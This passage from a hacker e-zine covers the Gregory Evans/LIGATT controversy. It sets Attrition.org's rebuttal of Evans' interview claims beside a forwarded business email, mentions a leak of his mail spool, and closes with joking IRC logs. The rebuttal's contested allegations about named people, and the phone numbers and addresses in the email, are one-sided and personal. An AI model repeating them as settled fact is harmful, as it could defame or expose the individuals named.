consulting services of any capacity. Attrition.org claims that Evans is currently in debtof over $9,000,000 USD, and the Better Business Bereau currently lists LIGATT as an 'F' rating.Evans denies all counts of misdoing and considers himself a wealthy, successful businessman.In mid-January, Go Null Yourself Zine contacted LIGATT to request an interview with Evans. After afew days of conversation with Evans' PR assistant, the interview request was accepted. Theinterview spanned across two days (due to phone difficulties) and about 2 hours and 10 minutes ofconversation was recorded. A detailed look at Evans' past was provided, and many shots were takenat the people and organizations calling him a fraud.There are simply too many details from the interview to enumerate here, so we have instead made therecordings public at http://www.gonullyourself.org/zine/4/ligatt for those who are interested.After the interview, we contacted Attrition.org to get their take on everything told to us by Evans.We provided a list of key claims made by Evans, and this is their reply: All of this is the best of my memory, or with citation if I have it. : Evans lived in Germany in his youth and got in trouble for changing a : friend's grades. The father of this friend, who was a lawyer, hired : Evans (as a kid) to break into the computers of a competing law firm. I think this is partially new. The 'changing grades' claim has been made before, but not with additional details above. : In 1994, Evans operated the 4th or 5th largest ISP in the country named : Connect America financed by money made from hacking side-jobs. (I am : unsure if he meant in America or Germany) In the US, in California. Claims of the size are unverified, and I doubt they can be. The part about making money from hacking side-jobs is likely BS. During this time with Connect America, he was stealing phone lines and reselling them. This is basic toll fraud, and what lead him to getting busted and serving 2 years in prison. http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf : Evans was friends with Kevin Mitnick in California, and they learned : about computers and phreaking together. This is a lie. Kevin Mitnick confirmed that while they were on the same floor of the LA detention center, they did not share a cell (as previously claimed by Evans), did not share any hacking / phreaking information, and did not learn from each other. Mitnick described Evans as someone who didn't seem to know much about hacking and asked basic questions. You can confirm this with a mail to Mitnick, and some of it covered here: http://attrition.org/errata/charlatan/gregory_evans/evans09.html http://twitter.com/kevinmitnick/statuses/16428972158 http://twitter.com/kevinmitnick/statuses/16429370781 : Evans has 100 employees and has hired people in Pakistan and India. This is hard to positively debunk, but I am relatively sure he does not have 100 employees currently. He has likely had 100 historically, but has a very high turnover rate. His claims of consultants in other countries make this basically impossible to verify, especially since he has not published financials for 2010 as required by the SEC. : The term "number 1 hacker" came from Mr. Morris, the FBI agent that : arrested Evans, who described Evans as on the "top 10 list of number 1 : hackers." This is a new claim (re: Morris), but based on my experience with the FBI seems absurd. Evans was convicted of toll fraud, not really 'hacking'. At that time, the FBI had seen some pretty high end / impressive hacking, and what Evans was doing didn't come close. : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and : a $4 million house. None of this can be verified so far, and we've tried. Given the apartments he has lived in for the last 2 years, as verified by ex employees, it is unlikely he has had any significant money to do this. Based on court records we have published, he likely has never actually had 1 million dollars, just serious debt, including the ~ 10 million he still owes. Even now, he owes serious money not only for the previous crimes, but as a result of his business dealings the last few years. We have some of the records: http://attrition.org/errata/charlatan/gregory_evans/ligatt15/ A summary of his debt: http://attrition.org/errata/charlatan/gregory_evans/evans21.html : Evans's book "Laptop Security" sold 150,000 copies. We have not heard this claim. However, search Amazon for that title and look how many are available new/used, and it is likely false. It's curious he is focusing on that book, as all of his previous claims centered around the 'No 1 Hacker' book. : The material found online in Evans's "No. 1 Hacker" book was not : copyrighted and therefore was not legally forbidden to use. This is patently false. The material he found online *was* copyrighted, even if the work did not explicitly say it was. This is copyright 101. There is currently a group of the authors that are still considering taking action against him. I have personally read mails from half a dozen of these authors that confirm they hold the copyright, and that they did NOT give him permsission or sell it to him (as he claimed in other sources). A mail to Simple Nomad of NMRC will confirm this as one of the authors (who will reply and confirm, while others will not due to potential legal action). : Evans was contracted to set up a CCTV camera network at a county prison : while on probation. Never heard this claim, but given how prisons work (and two direct family members that worked in that system), this is very dubious. : Evans has committed "every type of high-tech crime you can ever think of : before [he] was 26-years-old." Again, his conviction was for basic toll fraud. This doesn't suggest any level of skill that would back this claim. : In 1998, Evans was interrogated by the authorities regarding a : system-wide crash of the SkyTel pager network. No way to verify this short of a FOIA request for that case. I have not heard this claim before. : Every time Evans was caught by the authorities, it was because someone : else snitched on him. The current court records do not suggest this. They do suggest that Evans was a snitch (see Mitnick's presentation last year about the topic). We have the docket for his big case online, and there is no mention of a snitch. http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf http://attrition.org/errata/charlatan/gregory_evans/ligatt07/ : "High-tech grand theft" is a new state crime that was formed : specifically because of Evans's actions. There is no state law that uses those words I bet =) Did he mean Georgia? How 'new'? This would be easy to verify unless he further spins the claim. : There are plenty more points, but there's just too much stuff to listen : to. It's not too bad of a list, anyways. As usual, and it isn't just Evans, these types of claims are almost always made without any real detail, no verification from HIM, etc. Unfortunately, a lot of these are new claims or have new elements we haven't seen. : I have also attached an email that Evans forwarded to me that may be of : interest to you. Thank you again for your time, and I look forward to : your response to these claims. Yep, np! If you want to run any other claims by me, feel free. I will be offline for about 24 hours starting Thursday as I fly back to the states. As for the e-mail, I have read it before actually via Don. It was not published on attrition.org because it is irrelevant to Evans' claims. Because he offered to buy a web site, doesn't mean any deal was made regarding publishing material written by Don. It does not speak to any agreement, purchase or transfer of copyright of text included in Evans book. So yes, it wasn't included on our site =) As always, showing one thing that is marginally related to a piece of another story isn't proof, but it is an essential tool in a con. - jerichoThe attached email mentioned above can be read here. Evans forwarded this to us after the interview: Sorry we got disconnected. Here is proof that I sent Donald an email asking to buy his website 6 months before hand. Proving that there was no malicious intent. This is the stuff that they did not put on Attrition.org. Also if you want to finish up just let me no. Begin forwarded message: > From: "EH-Net-Don" > Date: December 17, 2009 12:15:13 PM EST > To: "'Gregory Evans'" > Subject: [SPAM] RE: Purchase of Ethical Hacker Network > Reply-To: > > Hey Gregory, > > Thank you very much for your kind words. It’s never a bad thing to have your blood, sweat and > tears get recognized in a positive way. Although I’m not sure selling is my desire at the > moment, I’m always willing to talk business and make new friends in the industry. Either way, > you might be interested in getting the word out about your company and its products and > services to a wider ethical hacking community. Maybe we could also chat about advertising on > my site and/or supporting my ethical hacking conference, ChicagoCon. How’s that for a reverse > pitch? ;-) > > If you don’t mind me asking, how did you find out about us? > > Looking forward, > Don > > PS – There’s a typo in you LA address. Guess I can’t stop being an editor. J > Donald C. Donzal, CISSP, MCSE 2003, CEH, Security+ SME > The Digital Construction Company > 1520 Heidorn Ave. > Westchester, IL 60154 > 708.837.3002 (Cell) > Founder & Organizer > ChicagoCon > Editor-In-Chief > The Ethical Hacker Network > > > > From: Gregory Evans [mailto:gregoryevans@ligatt.com] > Sent: Wednesday, December 16, 2009 11:38 PM > To: don@ethicalhacker.net > Subject: Purchase of Ethical Hacker Network > > Hello Donzal, > > My name is Gregory Evans the CEO of LIGATT Security International (www.ligatt.com). I am very > impressed with your website Ethical Hacker Network. I would love to speak to you sometime > about purchasing the website and still having you run the site. If you are interested please > feel to contact me at 866-354-4288 Ext. 5673. > > Have a Blessed Day, > > Gregory Evans > President / CEO > > 866-354-4288 Ext. 5673 > > Atlanta: > 6050 Peachtree Parkway > Suite 200 > Norcross, Ga 30092 > > Los Angeles: > 11209 Naitonal Blvd. > Suite 178 > Los Angeles, Ca 90292 > Have a Blessed Day, Gregory Evans President / CEO Ring: 866-354-4288 Ext. 5673 Look: www.LIGATT.COM Follow: www.twitter.com/ligatt Post: www.facebook.com/GregoryDEvans Atlanta 6050 Peachtree Parkway Suite 200 Norcross, Ga 30092As if there wasn't enough drama already, on February 2, a message was broadcasted to the Full-Disclosure mailing list detailing the compromise of Evans' websites and email accounts, leakinghordes of personal and confidential information. We, personally, have taken little time to lookthrough the leak and aren't able to better confirm or deny any claims made by Evans. There is mostlikely much to learn, though, according to Jericho: : Thank you very much for providing insight on these claims. Would it be : okay to publish this email in the zine? I think it would be interesting : to place this side-by-side with the interview. Yep, feel free. Also note, that with recent events (Evans' entire mail spool being leaked / published), some of these claims may be more thoroughly debunked in the coming weeks. As an example, his mail spool shows that he did register thecyberwars.com despite repeated claims he had nothing to do with it. : > : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and : > : a $4 million house. : > : > None of this can be verified so far, and we've tried. Given the apartments : > he has lived in for the last 2 years, as verified by ex employees, it is A recent mail leaked from his spool shows that he could not even rent an apartment under his mom's name after they performed due diligence. When confronted with it, Evans libels attrition: http://pastebin.com/J4JeG2W8 : > A summary of his debt: : > : > http://attrition.org/errata/charlatan/gregory_evans/evans21.html Updated with another entry since this mail.Also, : Additionally, I found these the other day; you may also find them wildly : amusing: : : http://www.theregister.co.uk/2011/01/31/ligatt_security_subpoena_quashed/ Already posted on the charlatan page. : http://www.escapistmagazine.com/news/view/107413-Computer-Hackers-Getting-Their-Own-Reality-Show He claims his life story was bought for a movie, that never materialized. As I tweeted the other day: Hey @GregoryDEvans or @LIGATT .. any comment on why the last movie deal went nowhere? http://in.sys-con.com/node/927014 If he did get a reality show, why doesn't he name the network / company that bought it?And, : ?I have to be modest and say that we at LIGATT could not have been able : to do this without the help of Chris John Riley, Kris French, Sam Bowne, : Elizabeth Summers, Atrrion.org, Crabbybastard.com and all the other : people who kept our name relevant. What sealed the deal for us and got : the networks to say, ?lets do it? was ?LIGATTleaks?. Again, I have shown : that what people may say about you or try to do to you does not stand in : the way of my success. Success it the best revenge,? says Evans. : : Thought that was funny. Yep, that is his new strategy for the last few weeks, he said the same thing in one of his recent video blogs as well.-=-=-If you would like to weigh in on the interview, the LIGATT controversy, or anything related toLIGATT, Gregory D. Evans, or the leak, our contact information is in the introduction - we willpublish intelligent arguments and opinions (both for and against) in the next issue.[==================================================================================================]-=[ 0x0e Et Cetera, Etc.-=[ Author: teh crewIn the absence of any real miscellaneous content, why not take a look at some of the shenanigansthat go on in the good 'ol #gny.We're competent! We promise!----------------------------------------------------------------------------------------------------[16:22] It is expected on February 3rd, 2011, that there will be a formal announcement in the US that IPv4 addresses have been completely exhausted[16:23] yes[16:23] but they finished today[16:23] who got the last one?[16:23] fucked if i know[16:23] was it 999.999.999.999[16:23] but I would sell it[16:23] oliverjhudson93, I hope you are trolling[16:23] cause otherwise[16:23] that was the most retarded thing[16:23] I have ever heard[16:23] nah i'm pulling your leg :P[16:23] good[16:23] (im joking)[16:24] cough liar[16:24] you are joking about lying?[16:24] i'm joking about joking?[16:24] I don't know anymore[16:24] I'm gonna DDoS 127.0.0.1 D:[16:25] oliverjhudson93, what is the highest IP someone could have?[16:25] not even taking into account the limits set in place for broadcasts blah blah blah[16:25] straight up, highest IP address[16:25] 255[16:26] I don't actually know[16:26] but i figure[16:26] 255.255.255.255? [16:26] but thats like[16:26] subnet mask or some shit that I don't understand[16:26] technically it's 256.256.256.256[16:26] but as we have limits imposed[16:26] yes[16:26] 255.255.255.255[16:26] See I dun goof'd![16:27] urr no[16:27] it is 0-255[16:27] yea I fubar'd [16:27] because that is the range of values you can store in an 8bit number[16:27] you don't know[16:27] how hard[16:27] I headdesked[16:27] after I typed that[16:27] :P[16:27] I am embarrassed for you[16:27] and was hoping no one would catch itA shitty situation----------------------------------------------------------------------------------------------------[21:58] <&elchupathingy> storm would you be pissed if i took a shit on your porch?[22:05] <~Silks> what if I were to?[22:06] <&storm> i would be curious to see that since i don't have a porch[22:06] <~Silks> what do you have that I could shit on?[22:07] <&storm> the dorm building has a stoop, i guess[22:07] <&storm> well, not really actually[22:08] <~Silks> what about siblings?[22:08] <~Silks> do you have a sister?[22:08] <&storm> i'm an only child[22:08] <&storm> :([22:08] <~Silks> ditto[22:08] <~Silks> however that means you have a lot of stuff[22:08] <~Silks> and therefore a lot of things to be fouled[22:09] <&storm> this is very true[22:10] <&elchupathingy> what if[22:10] <&elchupathingy> we built a porch[22:10] <&elchupathingy> then shit on it[22:10] <&storm> i like your thinkingGTFO emo storm----------------------------------------------------------------------------------------------------[01:12] sometimes i message myself to check if i'm still connected[01:13] that sounds depressing as hellWe could go on, but that would only embarrass us more. And everyone knows the first rule to being asooper l33t h4xx0r klan is to only portray yourselves as FUCKING HARDCORE MOTHERFUCKERS.Yeah, whatever.So, yeah. Looks like the end of issue #4 - hope you liked it. Like always, if you'd like to submitcontent for future issues, our contact information is in the introduction. The call for papers forissue #5 is now open, so get your crap in.See you in the summer. <3, the gny crew irc.gonullyourself.org +6697 #gny[==================================================================================================] 转载地址:http://jihvi.baihongyu.com/